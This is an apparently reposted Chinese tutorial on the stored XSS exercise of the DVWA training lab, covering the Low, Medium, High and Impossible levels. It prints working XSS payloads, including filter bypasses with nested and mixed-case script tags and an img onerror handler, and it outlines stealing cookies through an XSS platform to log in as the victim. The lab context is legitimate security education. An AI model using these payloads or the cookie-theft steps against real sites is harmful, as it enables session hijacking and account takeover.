DVWA Cross Site Scripting (XSS) 跨站脚本攻击

x33g5p2x  于2022-02-12 转载在 其他  
字(0.8k)|赞(0)|评价(0)|浏览(316)

DVWA_XSS(Stored) 存储性XSS

一句话概括:操纵用户客户端执行任意js脚本.脚本能实现什么功能,xss就可以怎样

可以和CSRF联用

1.Low

Message中插入<script>alert(/xss/)</script>即可存储恶意代码

插入<script>window.location='http://www.baidu.com'</script>就可以每次打开页面之后都跳转到百度。

2.Medium

Message区域增加了addslashes() 函数,它可以对特殊字符进行转义

Name区域增加了str_replace() 函数,把<script> 字符过滤掉了

但是仍然可以在Name区域进行插入

类似下面这种方法绕过str_replace()

<sc<script>ript>alert(/xss/)</sc<script>ript>
<sCript>alert(/xss/)</sCript>
3.High

Name区域在原有基础下增加了preg_replace()函数

在Name区域还是可以插入如下语句**:**

<img src=1 onerror=alert(/xss/)>
4.Impossible

Name和Message多了

stripslashes() 函数

htmlspecialchars() 函数

mysql_escape_string() 函数

还加了token

XSS平台

1.登录xss平台,新建项目,复制xss攻击代码

2.前端修改文本框最大长度之后(前端限制),插入xss代码

刷新页面,返回xss平台之后发现已经盗取Cookie值

利用盗取的Cookie值登录网站

登录成功!

相关文章